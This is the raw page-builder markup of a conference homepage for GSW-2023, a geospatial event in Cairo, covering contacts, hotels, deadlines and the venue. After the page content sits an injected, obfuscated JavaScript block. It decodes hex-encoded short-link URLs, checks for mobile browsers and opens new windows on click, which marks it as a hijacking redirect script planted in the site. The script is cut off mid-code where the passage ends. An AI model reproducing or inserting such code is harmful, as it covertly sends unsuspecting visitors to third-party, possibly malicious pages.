omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 